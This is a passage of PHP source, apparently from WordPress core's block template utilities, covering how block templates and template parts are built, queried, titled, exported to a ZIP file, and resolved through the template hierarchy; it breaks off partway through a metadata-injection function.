function _inject_theme_attribute_in_template_part_block( &$block ) {
if (
'core/template-part' === $block['blockName'] &&
! isset( $block['attrs']['theme'] )
) {
$block['attrs']['theme'] = get_stylesheet();
}
}
/**
* Removes the `theme` attribute from a given template part block.
*
* @since 6.4.0
* @access private
*
* @param array $block a parsed block.
*/
function _remove_theme_attribute_from_template_part_block( &$block ) {
if (
'core/template-part' === $block['blockName'] &&
isset( $block['attrs']['theme'] )
) {
unset( $block['attrs']['theme'] );
}
}
/**
* Builds a unified template object based on a theme file.
*
* @since 5.9.0
* @since 6.3.0 Added `modified` property to template objects.
* @access private
*
* @param array $template_file Theme file.
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
* @return WP_Block_Template Template.
*/
function _build_block_template_result_from_file( $template_file, $template_type ) {
$default_template_types = get_default_block_template_types();
$theme = get_stylesheet();
$template = new WP_Block_Template();
$template->id = $theme . '//' . $template_file['slug'];
$template->theme = $theme;
$template->content = file_get_contents( $template_file['path'] );
$template->slug = $template_file['slug'];
$template->source = 'theme';
$template->type = $template_type;
$template->title = ! empty( $template_file['title'] ) ? $template_file['title'] : $template_file['slug'];
$template->status = 'publish';
$template->has_theme_file = true;
$template->is_custom = true;
$template->modified = null;
if ( 'wp_template' === $template_type ) {
$registered_template = WP_Block_Templates_Registry::get_instance()->get_by_slug( $template_file['slug'] );
if ( $registered_template ) {
$template->plugin = $registered_template->plugin;
$template->title = empty( $template->title ) || $template->title === $template->slug ? $registered_template->title : $template->title;
$template->description = empty( $template->description ) ? $registered_template->description : $template->description;
}
}
if ( 'wp_template' === $template_type && isset( $default_template_types[ $template_file['slug'] ] ) ) {
$template->description = $default_template_types[ $template_file['slug'] ]['description'];
$template->title = $default_template_types[ $template_file['slug'] ]['title'];
$template->is_custom = false;
}
if ( 'wp_template' === $template_type && isset( $template_file['postTypes'] ) ) {
$template->post_types = $template_file['postTypes'];
}
if ( 'wp_template_part' === $template_type && isset( $template_file['area'] ) ) {
$template->area = $template_file['area'];
}
if ( 'wp_template_part' === $template->type ) {
/*
* In order for hooked blocks to be inserted at positions first_child and last_child in a template part,
* we need to wrap its content a mock template part block and traverse it.
*/
$content = get_comment_delimited_block_content(
'core/template-part',
array(),
$template->content
);
$content = apply_block_hooks_to_content(
$content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
$template->content = remove_serialized_parent_block( $content );
} else {
$template->content = apply_block_hooks_to_content(
$template->content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
}
return $template;
}
/**
* Builds the title and description of a post-specific template based on the underlying referenced post.
*
* Mutates the underlying template object.
*
* @since 6.1.0
* @access private
*
* @param string $post_type Post type, e.g. page, post, product.
* @param string $slug Slug of the post, e.g. a-story-about-shoes.
* @param WP_Block_Template $template Template to mutate adding the description and title computed.
* @return bool Returns true if the referenced post was found and false otherwise.
*/
function _wp_build_title_and_description_for_single_post_type_block_template( $post_type, $slug, WP_Block_Template $template ) {
$post_type_object = get_post_type_object( $post_type );
$default_args = array(
'post_type' => $post_type,
'post_status' => 'publish',
'posts_per_page' => 1,
'update_post_meta_cache' => false,
'update_post_term_cache' => false,
'ignore_sticky_posts' => true,
'no_found_rows' => true,
);
$args = array(
'name' => $slug,
);
$args = wp_parse_args( $args, $default_args );
$posts_query = new WP_Query( $args );
if ( empty( $posts_query->posts ) ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor referencing a post that was not found. 1: Post type singular name, 2: Post type slug. */
__( 'Not found: %1$s (%2$s)' ),
$post_type_object->labels->singular_name,
$slug
);
return false;
}
$post_title = $posts_query->posts[0]->post_title;
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Post type singular name, 2: Post title. */
__( '%1$s: %2$s' ),
$post_type_object->labels->singular_name,
$post_title
);
$template->description = sprintf(
/* translators: Custom template description in the Site Editor. %s: Post title. */
__( 'Template for %s' ),
$post_title
);
$args = array(
'title' => $post_title,
);
$args = wp_parse_args( $args, $default_args );
$posts_with_same_title_query = new WP_Query( $args );
if ( count( $posts_with_same_title_query->posts ) > 1 ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Template title, 2: Post type slug. */
__( '%1$s (%2$s)' ),
$template->title,
$slug
);
}
return true;
}
/**
* Builds the title and description of a taxonomy-specific template based on the underlying entity referenced.
*
* Mutates the underlying template object.
*
* @since 6.1.0
* @access private
*
* @param string $taxonomy Identifier of the taxonomy, e.g. category.
* @param string $slug Slug of the term, e.g. shoes.
* @param WP_Block_Template $template Template to mutate adding the description and title computed.
* @return bool True if the term referenced was found and false otherwise.
*/
function _wp_build_title_and_description_for_taxonomy_block_template( $taxonomy, $slug, WP_Block_Template $template ) {
$taxonomy_object = get_taxonomy( $taxonomy );
$default_args = array(
'taxonomy' => $taxonomy,
'hide_empty' => false,
'update_term_meta_cache' => false,
);
$term_query = new WP_Term_Query();
$args = array(
'number' => 1,
'slug' => $slug,
);
$args = wp_parse_args( $args, $default_args );
$terms_query = $term_query->query( $args );
if ( empty( $terms_query ) ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor, referencing a taxonomy term that was not found. 1: Taxonomy singular name, 2: Term slug. */
__( 'Not found: %1$s (%2$s)' ),
$taxonomy_object->labels->singular_name,
$slug
);
return false;
}
$term_title = $terms_query[0]->name;
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Taxonomy singular name, 2: Term title. */
__( '%1$s: %2$s' ),
$taxonomy_object->labels->singular_name,
$term_title
);
$template->description = sprintf(
/* translators: Custom template description in the Site Editor. %s: Term title. */
__( 'Template for %s' ),
$term_title
);
$term_query = new WP_Term_Query();
$args = array(
'number' => 2,
'name' => $term_title,
);
$args = wp_parse_args( $args, $default_args );
$terms_with_same_title_query = $term_query->query( $args );
if ( count( $terms_with_same_title_query ) > 1 ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Template title, 2: Term slug. */
__( '%1$s (%2$s)' ),
$template->title,
$slug
);
}
return true;
}
/**
* Builds a block template object from a post object.
*
* This is a helper function that creates a block template object from a given post object.
* It is self-sufficient in that it only uses information passed as arguments; it does not
* query the database for additional information.
*
* @since 6.5.3
* @access private
*
* @param WP_Post $post Template post.
* @param array $terms Additional terms to inform the template object.
* @param array $meta Additional meta fields to inform the template object.
* @return WP_Block_Template|WP_Error Template or error object.
*/
function _build_block_template_object_from_post_object( $post, $terms = array(), $meta = array() ) {
if ( empty( $terms['wp_theme'] ) ) {
return new WP_Error( 'template_missing_theme', __( 'No theme is defined for this template.' ) );
}
$theme = $terms['wp_theme'];
$default_template_types = get_default_block_template_types();
$template_file = _get_block_template_file( $post->post_type, $post->post_name );
$has_theme_file = get_stylesheet() === $theme && null !== $template_file;
$template = new WP_Block_Template();
$template->wp_id = $post->ID;
$template->id = $theme . '//' . $post->post_name;
$template->theme = $theme;
$template->content = $post->post_content;
$template->slug = $post->post_name;
$template->source = 'custom';
$template->origin = ! empty( $meta['origin'] ) ? $meta['origin'] : null;
$template->type = $post->post_type;
$template->description = $post->post_excerpt;
$template->title = $post->post_title;
$template->status = $post->post_status;
$template->has_theme_file = $has_theme_file;
$template->is_custom = empty( $meta['is_wp_suggestion'] );
$template->author = $post->post_author;
$template->modified = $post->post_modified;
if ( 'wp_template' === $post->post_type && $has_theme_file && isset( $template_file['postTypes'] ) ) {
$template->post_types = $template_file['postTypes'];
}
if ( 'wp_template' === $post->post_type && isset( $default_template_types[ $template->slug ] ) ) {
$template->is_custom = false;
}
if ( 'wp_template_part' === $post->post_type && isset( $terms['wp_template_part_area'] ) ) {
$template->area = $terms['wp_template_part_area'];
}
return $template;
}
/**
* Builds a unified template object based a post Object.
*
* @since 5.9.0
* @since 6.3.0 Added `modified` property to template objects.
* @since 6.4.0 Added support for a revision post to be passed to this function.
* @access private
*
* @param WP_Post $post Template post.
* @return WP_Block_Template|WP_Error Template or error object.
*/
function _build_block_template_result_from_post( $post ) {
$post_id = wp_is_post_revision( $post );
if ( ! $post_id ) {
$post_id = $post;
}
$parent_post = get_post( $post_id );
$post->post_name = $parent_post->post_name;
$post->post_type = $parent_post->post_type;
$terms = get_the_terms( $parent_post, 'wp_theme' );
if ( is_wp_error( $terms ) ) {
return $terms;
}
if ( ! $terms ) {
return new WP_Error( 'template_missing_theme', __( 'No theme is defined for this template.' ) );
}
$terms = array(
'wp_theme' => $terms[0]->name,
);
if ( 'wp_template_part' === $parent_post->post_type ) {
$type_terms = get_the_terms( $parent_post, 'wp_template_part_area' );
if ( ! is_wp_error( $type_terms ) && false !== $type_terms ) {
$terms['wp_template_part_area'] = $type_terms[0]->name;
}
}
$meta = array(
'origin' => get_post_meta( $parent_post->ID, 'origin', true ),
'is_wp_suggestion' => get_post_meta( $parent_post->ID, 'is_wp_suggestion', true ),
);
$template = _build_block_template_object_from_post_object( $post, $terms, $meta );
if ( is_wp_error( $template ) ) {
return $template;
}
// Check for a block template without a description and title or with a title equal to the slug.
if ( 'wp_template' === $parent_post->post_type && empty( $template->description ) && ( empty( $template->title ) || $template->title === $template->slug ) ) {
$matches = array();
// Check for a block template for a single author, page, post, tag, category, custom post type, or custom taxonomy.
if ( preg_match( '/(author|page|single|tag|category|taxonomy)-(.+)/', $template->slug, $matches ) ) {
$type = $matches[1];
$slug_remaining = $matches[2];
switch ( $type ) {
case 'author':
$nice_name = $slug_remaining;
$users = get_users(
array(
'capability' => 'edit_posts',
'search' => $nice_name,
'search_columns' => array( 'user_nicename' ),
'fields' => 'display_name',
)
);
if ( empty( $users ) ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor, referencing a deleted author. %s: Author nicename. */
__( 'Deleted author: %s' ),
$nice_name
);
} else {
$author_name = $users[0];
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. %s: Author name. */
__( 'Author: %s' ),
$author_name
);
$template->description = sprintf(
/* translators: Custom template description in the Site Editor. %s: Author name. */
__( 'Template for %s' ),
$author_name
);
$users_with_same_name = get_users(
array(
'capability' => 'edit_posts',
'search' => $author_name,
'search_columns' => array( 'display_name' ),
'fields' => 'display_name',
)
);
if ( count( $users_with_same_name ) > 1 ) {
$template->title = sprintf(
/* translators: Custom template title in the Site Editor. 1: Template title of an author template, 2: Author nicename. */
__( '%1$s (%2$s)' ),
$template->title,
$nice_name
);
}
}
break;
case 'page':
_wp_build_title_and_description_for_single_post_type_block_template( 'page', $slug_remaining, $template );
break;
case 'single':
$post_types = get_post_types();
foreach ( $post_types as $post_type ) {
$post_type_length = strlen( $post_type ) + 1;
// If $slug_remaining starts with $post_type followed by a hyphen.
if ( 0 === strncmp( $slug_remaining, $post_type . '-', $post_type_length ) ) {
$slug = substr( $slug_remaining, $post_type_length, strlen( $slug_remaining ) );
$found = _wp_build_title_and_description_for_single_post_type_block_template( $post_type, $slug, $template );
if ( $found ) {
break;
}
}
}
break;
case 'tag':
_wp_build_title_and_description_for_taxonomy_block_template( 'post_tag', $slug_remaining, $template );
break;
case 'category':
_wp_build_title_and_description_for_taxonomy_block_template( 'category', $slug_remaining, $template );
break;
case 'taxonomy':
$taxonomies = get_taxonomies();
foreach ( $taxonomies as $taxonomy ) {
$taxonomy_length = strlen( $taxonomy ) + 1;
// If $slug_remaining starts with $taxonomy followed by a hyphen.
if ( 0 === strncmp( $slug_remaining, $taxonomy . '-', $taxonomy_length ) ) {
$slug = substr( $slug_remaining, $taxonomy_length, strlen( $slug_remaining ) );
$found = _wp_build_title_and_description_for_taxonomy_block_template( $taxonomy, $slug, $template );
if ( $found ) {
break;
}
}
}
break;
}
}
}
if ( 'wp_template' === $post->post_type ) {
$registered_template = WP_Block_Templates_Registry::get_instance()->get_by_slug( $template->slug );
if ( $registered_template ) {
$template->plugin = $registered_template->plugin;
$template->origin =
'theme' !== $template->origin && 'theme' !== $template->source ?
'plugin' :
$template->origin;
$template->title = empty( $template->title ) || $template->title === $template->slug ? $registered_template->title : $template->title;
$template->description = empty( $template->description ) ? $registered_template->description : $template->description;
}
}
if ( 'wp_template_part' === $template->type ) {
$existing_ignored_hooked_blocks = get_post_meta( $post->ID, '_wp_ignored_hooked_blocks', true );
$attributes = ! empty( $existing_ignored_hooked_blocks ) ? array( 'metadata' => array( 'ignoredHookedBlocks' => json_decode( $existing_ignored_hooked_blocks, true ) ) ) : array();
/*
* In order for hooked blocks to be inserted at positions first_child and last_child in a template part,
* we need to wrap its content a mock template part block and traverse it.
*/
$content = get_comment_delimited_block_content(
'core/template-part',
$attributes,
$template->content
);
$content = apply_block_hooks_to_content(
$content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
$template->content = remove_serialized_parent_block( $content );
} else {
$template->content = apply_block_hooks_to_content(
$template->content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
}
return $template;
}
/**
* Retrieves a list of unified template objects based on a query.
*
* @since 5.8.0
*
* @param array $query {
* Optional. Arguments to retrieve templates.
*
* @type string[] $slug__in List of slugs to include.
* @type int $wp_id Post ID of customized template.
* @type string $area A 'wp_template_part_area' taxonomy value to filter by (for 'wp_template_part' template type only).
* @type string $post_type Post type to get the templates for.
* }
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
* @return WP_Block_Template[] Array of block templates.
*/
function get_block_templates( $query = array(), $template_type = 'wp_template' ) {
/**
* Filters the block templates array before the query takes place.
*
* Return a non-null value to bypass the WordPress queries.
*
* @since 5.9.0
*
* @param WP_Block_Template[]|null $block_templates Return an array of block templates to short-circuit the default query,
* or null to allow WP to run its normal queries.
* @param array $query {
* Arguments to retrieve templates. All arguments are optional.
*
* @type string[] $slug__in List of slugs to include.
* @type int $wp_id Post ID of customized template.
* @type string $area A 'wp_template_part_area' taxonomy value to filter by (for 'wp_template_part' template type only).
* @type string $post_type Post type to get the templates for.
* }
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
$templates = apply_filters( 'pre_get_block_templates', null, $query, $template_type );
if ( ! is_null( $templates ) ) {
return $templates;
}
$post_type = isset( $query['post_type'] ) ? $query['post_type'] : '';
$wp_query_args = array(
'post_status' => array( 'auto-draft', 'draft', 'publish' ),
'post_type' => $template_type,
'posts_per_page' => -1,
'no_found_rows' => true,
'lazy_load_term_meta' => false,
'tax_query' => array(
array(
'taxonomy' => 'wp_theme',
'field' => 'name',
'terms' => get_stylesheet(),
),
),
);
if ( 'wp_template_part' === $template_type && isset( $query['area'] ) ) {
$wp_query_args['tax_query'][] = array(
'taxonomy' => 'wp_template_part_area',
'field' => 'name',
'terms' => $query['area'],
);
$wp_query_args['tax_query']['relation'] = 'AND';
}
if ( ! empty( $query['slug__in'] ) ) {
$wp_query_args['post_name__in'] = $query['slug__in'];
$wp_query_args['posts_per_page'] = count( array_unique( $query['slug__in'] ) );
}
// This is only needed for the regular templates/template parts post type listing and editor.
if ( isset( $query['wp_id'] ) ) {
$wp_query_args['p'] = $query['wp_id'];
} else {
$wp_query_args['post_status'] = 'publish';
}
$template_query = new WP_Query( $wp_query_args );
$query_result = array();
foreach ( $template_query->posts as $post ) {
$template = _build_block_template_result_from_post( $post );
if ( is_wp_error( $template ) ) {
continue;
}
if ( $post_type && ! $template->is_custom ) {
continue;
}
if (
$post_type &&
isset( $template->post_types ) &&
! in_array( $post_type, $template->post_types, true )
) {
continue;
}
$query_result[] = $template;
}
if ( ! isset( $query['wp_id'] ) ) {
/*
* If the query has found some user templates, those have priority
* over the theme-provided ones, so we skip querying and building them.
*/
$query['slug__not_in'] = wp_list_pluck( $query_result, 'slug' );
/*
* We need to unset the post_type query param because some templates
* would be excluded otherwise, like `page.html` when looking for
* `page` templates. We need all templates so we can exclude duplicates
* from plugin-registered templates.
* See: https://github.com/WordPress/gutenberg/issues/65584
*/
$template_files_query = $query;
unset( $template_files_query['post_type'] );
$template_files = _get_block_templates_files( $template_type, $template_files_query );
foreach ( $template_files as $template_file ) {
// If the query doesn't specify a post type, or it does and the template matches the post type, add it.
if (
! isset( $query['post_type'] ) ||
(
isset( $template_file['postTypes'] ) &&
in_array( $query['post_type'], $template_file['postTypes'], true )
)
) {
$query_result[] = _build_block_template_result_from_file( $template_file, $template_type );
} elseif ( ! isset( $template_file['postTypes'] ) ) {
// The custom templates with no associated post types are available for all post types as long
// as they are not default templates.
$candidate = _build_block_template_result_from_file( $template_file, $template_type );
$default_template_types = get_default_block_template_types();
if ( ! isset( $default_template_types[ $candidate->slug ] ) ) {
$query_result[] = $candidate;
}
}
}
if ( 'wp_template' === $template_type ) {
// Add templates registered in the template registry. Filtering out the ones which have a theme file.
$registered_templates = WP_Block_Templates_Registry::get_instance()->get_by_query( $query );
$matching_registered_templates = array_filter(
$registered_templates,
function ( $registered_template ) use ( $template_files ) {
foreach ( $template_files as $template_file ) {
if ( $template_file['slug'] === $registered_template->slug ) {
return false;
}
}
return true;
}
);
$matching_registered_templates = array_map(
function ( $template ) {
$template->content = apply_block_hooks_to_content(
$template->content,
$template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
return $template;
},
$matching_registered_templates
);
$query_result = array_merge( $query_result, $matching_registered_templates );
}
}
/**
* Filters the array of queried block templates array after they've been fetched.
*
* @since 5.9.0
*
* @param WP_Block_Template[] $query_result Array of found block templates.
* @param array $query {
* Arguments to retrieve templates. All arguments are optional.
*
* @type string[] $slug__in List of slugs to include.
* @type int $wp_id Post ID of customized template.
* @type string $area A 'wp_template_part_area' taxonomy value to filter by (for 'wp_template_part' template type only).
* @type string $post_type Post type to get the templates for.
* }
* @param string $template_type wp_template or wp_template_part.
*/
return apply_filters( 'get_block_templates', $query_result, $query, $template_type );
}
/**
* Retrieves a single unified template object using its id.
*
* @since 5.8.0
*
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Optional. Template type. Either 'wp_template' or 'wp_template_part'.
* Default 'wp_template'.
* @return WP_Block_Template|null Template.
*/
function get_block_template( $id, $template_type = 'wp_template' ) {
/**
* Filters the block template object before the query takes place.
*
* Return a non-null value to bypass the WordPress queries.
*
* @since 5.9.0
*
* @param WP_Block_Template|null $block_template Return block template object to short-circuit the default query,
* or null to allow WP to run its normal queries.
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
$block_template = apply_filters( 'pre_get_block_template', null, $id, $template_type );
if ( ! is_null( $block_template ) ) {
return $block_template;
}
$parts = explode( '//', $id, 2 );
if ( count( $parts ) < 2 ) {
return null;
}
list( $theme, $slug ) = $parts;
$wp_query_args = array(
'post_name__in' => array( $slug ),
'post_type' => $template_type,
'post_status' => array( 'auto-draft', 'draft', 'publish', 'trash' ),
'posts_per_page' => 1,
'no_found_rows' => true,
'tax_query' => array(
array(
'taxonomy' => 'wp_theme',
'field' => 'name',
'terms' => $theme,
),
),
);
$template_query = new WP_Query( $wp_query_args );
$posts = $template_query->posts;
if ( count( $posts ) > 0 ) {
$template = _build_block_template_result_from_post( $posts[0] );
if ( ! is_wp_error( $template ) ) {
return $template;
}
}
$block_template = get_block_file_template( $id, $template_type );
/**
* Filters the queried block template object after it's been fetched.
*
* @since 5.9.0
*
* @param WP_Block_Template|null $block_template The found block template, or null if there isn't one.
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
return apply_filters( 'get_block_template', $block_template, $id, $template_type );
}
/**
* Retrieves a unified template object based on a theme file or plugin registration.
*
* This is a fallback of get_block_template(), used when no templates are found in the database.
* Also checks for templates registered via the Template Registration API.
*
* @since 5.9.0
*
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Optional. Template type. Either 'wp_template' or 'wp_template_part'.
* Default 'wp_template'.
* @return WP_Block_Template|null The found block template, or null if there isn't one.
*/
function get_block_file_template( $id, $template_type = 'wp_template' ) {
/**
* Filters the block template object before the theme file discovery takes place.
*
* Return a non-null value to bypass the WordPress theme file discovery.
*
* @since 5.9.0
*
* @param WP_Block_Template|null $block_template Return block template object to short-circuit the default query,
* or null to allow WP to run its normal queries.
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
$block_template = apply_filters( 'pre_get_block_file_template', null, $id, $template_type );
if ( ! is_null( $block_template ) ) {
return $block_template;
}
$parts = explode( '//', $id, 2 );
if ( count( $parts ) < 2 ) {
/** This filter is documented in wp-includes/block-template-utils.php */
return apply_filters( 'get_block_file_template', null, $id, $template_type );
}
list( $theme, $slug ) = $parts;
if ( get_stylesheet() === $theme ) {
$template_file = _get_block_template_file( $template_type, $slug );
if ( null !== $template_file ) {
$block_template = _build_block_template_result_from_file( $template_file, $template_type );
/** This filter is documented in wp-includes/block-template-utils.php */
return apply_filters( 'get_block_file_template', $block_template, $id, $template_type );
}
}
$block_template = WP_Block_Templates_Registry::get_instance()->get_by_slug( $slug );
if ( $block_template ) {
$block_template->content = apply_block_hooks_to_content(
$block_template->content,
$block_template,
'insert_hooked_blocks_and_set_ignored_hooked_blocks_metadata'
);
}
/**
* Filters the block template object after it has been (potentially) fetched from the theme file.
*
* @since 5.9.0
*
* @param WP_Block_Template|null $block_template The found block template, or null if there is none.
* @param string $id Template unique identifier (example: 'theme_slug//template_slug').
* @param string $template_type Template type. Either 'wp_template' or 'wp_template_part'.
*/
return apply_filters( 'get_block_file_template', $block_template, $id, $template_type );
}
/**
* Prints a block template part.
*
* @since 5.9.0
*
* @param string $part The block template part to print, for example 'header' or 'footer'.
*/
function block_template_part( $part ) {
$template_part = get_block_template( get_stylesheet() . '//' . $part, 'wp_template_part' );
if ( ! $template_part || empty( $template_part->content ) ) {
return;
}
echo do_blocks( $template_part->content );
}
/**
* Prints the header block template part.
*
* @since 5.9.0
*/
function block_header_area() {
block_template_part( 'header' );
}
/**
* Prints the footer block template part.
*
* @since 5.9.0
*/
function block_footer_area() {
block_template_part( 'footer' );
}
/**
* Determines whether a theme directory should be ignored during export.
*
* @since 6.0.0
*
* @param string $path The path of the file in the theme.
* @return bool Whether this file is in an ignored directory.
*/
function wp_is_theme_directory_ignored( $path ) {
$directories_to_ignore = array( '.DS_Store', '.svn', '.git', '.hg', '.bzr', 'node_modules', 'vendor' );
foreach ( $directories_to_ignore as $directory ) {
if ( str_starts_with( $path, $directory ) ) {
return true;
}
}
return false;
}
/**
* Creates an export of the current templates and
* template parts from the site editor at the
* specified path in a ZIP file.
*
* @since 5.9.0
* @since 6.0.0 Adds the whole theme to the export archive.
*
* @return WP_Error|string Path of the ZIP file or error on failure.
*/
function wp_generate_block_templates_export_file() {
$wp_version = wp_get_wp_version();
if ( ! class_exists( 'ZipArchive' ) ) {
return new WP_Error( 'missing_zip_package', __( 'Zip Export not supported.' ) );
}
$obscura = wp_generate_password( 12, false, false );
$theme_name = basename( get_stylesheet() );
$filename = get_temp_dir() . $theme_name . $obscura . '.zip';
$zip = new ZipArchive();
if ( true !== $zip->open( $filename, ZipArchive::CREATE | ZipArchive::OVERWRITE ) ) {
return new WP_Error( 'unable_to_create_zip', __( 'Unable to open export file (archive) for writing.' ) );
}
$zip->addEmptyDir( 'templates' );
$zip->addEmptyDir( 'parts' );
// Get path of the theme.
$theme_path = wp_normalize_path( get_stylesheet_directory() );
// Create recursive directory iterator.
$theme_files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator( $theme_path ),
RecursiveIteratorIterator::LEAVES_ONLY
);
// Make a copy of the current theme.
foreach ( $theme_files as $file ) {
// Skip directories as they are added automatically.
if ( ! $file->isDir() ) {
// Get real and relative path for current file.
$file_path = wp_normalize_path( $file );
$relative_path = substr( $file_path, strlen( $theme_path ) + 1 );
if ( ! wp_is_theme_directory_ignored( $relative_path ) ) {
$zip->addFile( $file_path, $relative_path );
}
}
}
// Load templates into the zip file.
$templates = get_block_templates();
foreach ( $templates as $template ) {
$template->content = traverse_and_serialize_blocks(
parse_blocks( $template->content ),
'_remove_theme_attribute_from_template_part_block'
);
$zip->addFromString(
'templates/' . $template->slug . '.html',
$template->content
);
}
// Load template parts into the zip file.
$template_parts = get_block_templates( array(), 'wp_template_part' );
foreach ( $template_parts as $template_part ) {
$zip->addFromString(
'parts/' . $template_part->slug . '.html',
$template_part->content
);
}
// Load theme.json into the zip file.
$tree = WP_Theme_JSON_Resolver::get_theme_data( array(), array( 'with_supports' => false ) );
// Merge with user data.
$tree->merge( WP_Theme_JSON_Resolver::get_user_data() );
$theme_json_raw = $tree->get_data();
// If a version is defined, add a schema.
if ( $theme_json_raw['version'] ) {
$theme_json_version = 'wp/' . substr( $wp_version, 0, 3 );
$schema = array( '$schema' => 'https://schemas.wp.org/' . $theme_json_version . '/theme.json' );
$theme_json_raw = array_merge( $schema, $theme_json_raw );
}
// Convert to a string.
$theme_json_encoded = wp_json_encode( $theme_json_raw, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE );
// Replace 4 spaces with a tab.
$theme_json_tabbed = preg_replace( '~(?:^|\G)\h{4}~m', "\t", $theme_json_encoded );
// Add the theme.json file to the zip.
$zip->addFromString(
'theme.json',
$theme_json_tabbed
);
// Save changes to the zip file.
$zip->close();
return $filename;
}
/**
* Gets the template hierarchy for the given template slug to be created.
*
* Note: Always add `index` as the last fallback template.
*
* @since 6.1.0
*
* @param string $slug The template slug to be created.
* @param bool $is_custom Optional. Indicates if a template is custom or
* part of the template hierarchy. Default false.
* @param string $template_prefix Optional. The template prefix for the created template.
* Used to extract the main template type, e.g.
* in `taxonomy-books` the `taxonomy` is extracted.
* Default empty string.
* @return string[] The template hierarchy.
*/
function get_template_hierarchy( $slug, $is_custom = false, $template_prefix = '' ) {
if ( 'index' === $slug ) {
/** This filter is documented in wp-includes/template.php */
return apply_filters( 'index_template_hierarchy', array( 'index' ) );
}
if ( $is_custom ) {
/** This filter is documented in wp-includes/template.php */
return apply_filters( 'page_template_hierarchy', array( 'page', 'singular', 'index' ) );
}
if ( 'front-page' === $slug ) {
/** This filter is documented in wp-includes/template.php */
return apply_filters( 'frontpage_template_hierarchy', array( 'front-page', 'home', 'index' ) );
}
$matches = array();
$template_hierarchy = array( $slug );
// Most default templates don't have `$template_prefix` assigned.
if ( ! empty( $template_prefix ) ) {
list( $type ) = explode( '-', $template_prefix );
// We need these checks because we always add the `$slug` above.
if ( ! in_array( $template_prefix, array( $slug, $type ), true ) ) {
$template_hierarchy[] = $template_prefix;
}
if ( $slug !== $type ) {
$template_hierarchy[] = $type;
}
} elseif ( preg_match( '/^(author|category|archive|tag|page)-.+$/', $slug, $matches ) ) {
$template_hierarchy[] = $matches[1];
} elseif ( preg_match( '/^(taxonomy|single)-(.+)$/', $slug, $matches ) ) {
$type = $matches[1];
$slug_remaining = $matches[2];
$items = 'single' === $type ? get_post_types() : get_taxonomies();
foreach ( $items as $item ) {
if ( ! str_starts_with( $slug_remaining, $item ) ) {
continue;
}
// If $slug_remaining is equal to $post_type or $taxonomy we have
// the single-$post_type template or the taxonomy-$taxonomy template.
if ( $slug_remaining === $item ) {
$template_hierarchy[] = $type;
break;
}
// If $slug_remaining is single-$post_type-$slug template.
if ( strlen( $slug_remaining ) > strlen( $item ) + 1 ) {
$template_hierarchy[] = "$type-$item";
$template_hierarchy[] = $type;
break;
}
}
}
// Handle `archive` template.
if (
str_starts_with( $slug, 'author' ) ||
str_starts_with( $slug, 'taxonomy' ) ||
str_starts_with( $slug, 'category' ) ||
str_starts_with( $slug, 'tag' ) ||
'date' === $slug
) {
$template_hierarchy[] = 'archive';
}
// Handle `single` template.
if ( 'attachment' === $slug ) {
$template_hierarchy[] = 'single';
}
// Handle `singular` template.
if (
str_starts_with( $slug, 'single' ) ||
str_starts_with( $slug, 'page' ) ||
'attachment' === $slug
) {
$template_hierarchy[] = 'singular';
}
$template_hierarchy[] = 'index';
$template_type = '';
if ( ! empty( $template_prefix ) ) {
list( $template_type ) = explode( '-', $template_prefix );
} else {
list( $template_type ) = explode( '-', $slug );
}
$valid_template_types = array( '404', 'archive', 'attachment', 'author', 'category', 'date', 'embed', 'frontpage', 'home', 'index', 'page', 'paged', 'privacypolicy', 'search', 'single', 'singular', 'tag', 'taxonomy' );
if ( in_array( $template_type, $valid_template_types, true ) ) {
/** This filter is documented in wp-includes/template.php */
return apply_filters( "{$template_type}_template_hierarchy", $template_hierarchy );
}
return $template_hierarchy;
}
/**
* Inject ignoredHookedBlocks metadata attributes into a template or template part.
*
* Given an object that represents a `wp_template` or `wp_template_part` post object
* prepared for inserting or updating the database, locate all blocks that have
* hooked blocks, and inject a `metadata.ignoredHookedBlocks` attribute into the anchor
* blocks to reflect the latter.
*
* @since 6.5.0
* @access private
*
* @param stdClass $changes An object representing a template or template part
* prepared for inserting or updating the database.
* @param WP_REST_Request $deprecated Deprecated. Not used.
* @return stdClass|WP_Error The updated object representing a template or template part.
*/
function inject_ignored_hooked_blocks_metadata_attributes( $changes, $deprecated = null ) {
if ( null !== $deprecated ) {
_deprecated_argument( __FUNCTION__, '6.5.3' );
}
if ( ! isset( $changes->post_content ) ) {
return $changes;
}
$hooked_blocks = get_hooked_blocks();
if ( empty( $hooked_blocks ) && ! has_filter( 'hooked_block_types' ) ) {
return $changes;
}
$meta = isset( $changes->meta_input ) ? $changes->meta_input : array();
$terms = isset( $changes->tax_input ) ? $changes->tax_input : array();
if ( empty( $changes->ID ) ) {
// There's no post object for this template in the database for this template yet.
$post = $changes;
} else {
// Find the existing post object.
$post = get_post( $changes->ID );
// If the post is a revision, use the parent post's post_name and post_type.
$post_id = wp_is_post_revision( $post );
if ( $post_id ) {
$parent_post = get_post( $post_id );
$post->post_name = $parent_post->post_name;
$post->post_type = $parent_post->post_type;
}
